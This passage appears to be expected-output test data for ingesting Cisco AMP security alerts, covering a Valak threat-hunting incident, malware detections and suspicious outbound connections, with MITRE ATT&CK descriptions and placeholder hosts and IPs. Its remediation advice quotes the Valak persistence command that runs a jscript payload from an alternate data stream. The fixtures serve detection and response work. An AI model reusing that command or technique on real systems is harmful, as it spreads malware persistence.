opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "87:c2:d9:a2:8c:74", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "threat_hunting": { + "severity": "critical", + "incident_title": "Valak Variant", + "incident_id": 416, + "incident_end_time": "2020-06-18T11:12:50.000Z", + "techniques": [ + { + "mitre_name": "technique", + "tactics_names": "Collection", + "system_requirements": "Privileges to access certain files and directories", + "permissions": "", + "name": "Data from Local System", + "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to 
Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n", + "external_id": "T1005", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "platforms": "Linux, macOS, Windows" + }, + { + "mitre_name": "technique", + "tactics_names": "Execution, Persistence, Privilege Escalation", + "permissions": "Administrator, SYSTEM, User", + "name": "Scheduled Task/Job", + "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n", + "external_id": "T1053", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "platforms": "Windows, Linux, macOS" + }, + { + "mitre_name": "technique", + "tactics_names": "Defense Evasion, Execution", + "permissions": "User", + "name": "Scripting", + "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n", + "external_id": "T1064", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "platforms": "Linux, macOS, Windows" + } + ], + "incident_start_time": "2021-01-15T10:48:08.000Z", + "tactics": [ + { + "name": "Defense Evasion", + "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n", + "mitre_name": "tactic", + "external_id": "TA0005", + "mitre_url": "https://attack.mitre.org/tactics/TA0005" + } + ], + "incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant. 
Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.", + "incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.", + "incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562", + "incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "87:c2:d9:a2:8c:74" + ] + }, + "techniques": [ + { + "mitre_name": "technique", + "tactics_names": "Collection", + "system_requirements": "Privileges to access certain files and directories", + "permissions": "", + "name": "Data from Local System", + "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather 
information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n", + "external_id": "T1005", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "platforms": "Linux, macOS, Windows" + }, + { + "mitre_name": "technique", + "tactics_names": "Execution, Persistence, Privilege Escalation", + "permissions": "Administrator, SYSTEM, User", + "name": "Scheduled Task/Job", + "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n", + "external_id": "T1053", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "platforms": "Windows, Linux, macOS" + }, + { + "mitre_name": "technique", + "tactics_names": "Defense Evasion, Execution", + "permissions": "User", + "name": "Scripting", + "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. 
Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\n", + "external_id": "T1064", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "platforms": "Linux, macOS, Windows" + } + ], + "tactics": [ + { + "name": "Defense Evasion", + "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n", + "mitre_name": "tactic", + "external_id": "TA0005", + "mitre_url": "https://attack.mitre.org/tactics/TA0005" + } + ], + "event_type_id": 1107296344 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "iexplore.exe", + "pid": 4040, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "@timestamp": "2021-01-15T11:20:38.000Z", + "file": { + "name": "wsymqyv90.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "hash": { + "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "md5": "e2f5dcd966e26d54329e8d79c7201652" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + 
"70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "hostname": "Demo_Upatre", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469616802Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",
\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6180352115244794000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.GenericKD:ZVETJ.18gs.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180352115244793858", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "iexplore.exe", + "pid": 4040, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "@timestamp": "2021-01-15T11:20:06.000Z", + "file": { + "name": "wsymqyv90.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "hash": { + "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "md5": "e2f5dcd966e26d54329e8d79c7201652" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + 
"name": "Demo_Upatre", + "hostname": "Demo_Upatre", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469618886Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30
174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6180351977805840000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.GenericKD:ZVETJ.18gs.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180351977805840385", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:45:07.000Z", + "file": { + "name": "iodnxvg.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469620841Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159258594551267000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ 
+ "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159258594551267599", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55810, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469622790Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006662", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": 
"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55805, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469624731Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection 